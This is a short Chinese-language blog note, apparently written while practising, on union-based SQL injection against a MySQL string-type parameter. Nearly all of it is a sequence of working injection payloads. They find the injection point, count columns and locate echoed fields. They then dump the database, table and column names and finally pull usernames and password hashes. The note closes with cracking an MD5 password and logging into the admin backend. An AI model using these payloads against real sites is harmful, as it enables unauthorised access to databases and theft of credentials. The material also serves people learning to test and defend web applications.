Mysql-字符型数据库注入笔记

本来是有图的，但是要上传太麻烦，有图点见我博客（在最下方有链接）

' %23判断注入点

' union select '1','2','3','4获取字段数，5开始报错，确定字段数为4

' and '1'='2' union select 判断可回显字段位置 ，是2和3

接下来获取数据库名 ' and '1'='2' union select '1',database(),user(),'字段

' and '1'='2' union select '1',group_concat(TABLE_NAME),'可回显字段倒数第二位','可回显字段倒数第一位' from information_schema.TABLES where TABLE_SCHEMA=database() and '1'='1 获取数据库中表名

' and '1'='2' union select '1',group_concat(COLUMN_NAME),'可回显字段倒数第二位','可回显字段最后一位' from information_schema.COLUMNS where TABLE_NAME='数据库表名' and '1'='1 获取字段名

' and '1'='2' union select '1',group_concat(字段名,字段名),'可回显字段倒数第二位','可回显字段最后一位' from 数据库表名 where '1'='1 获取用户名及密码

把md5加密过得密码进行解密

得出密码时083112

后台登录成功

转载请联系

详细看我博客

http://www.sakuar.cn/mysql-zifu/

本文原创，这个就是我博客里面的文章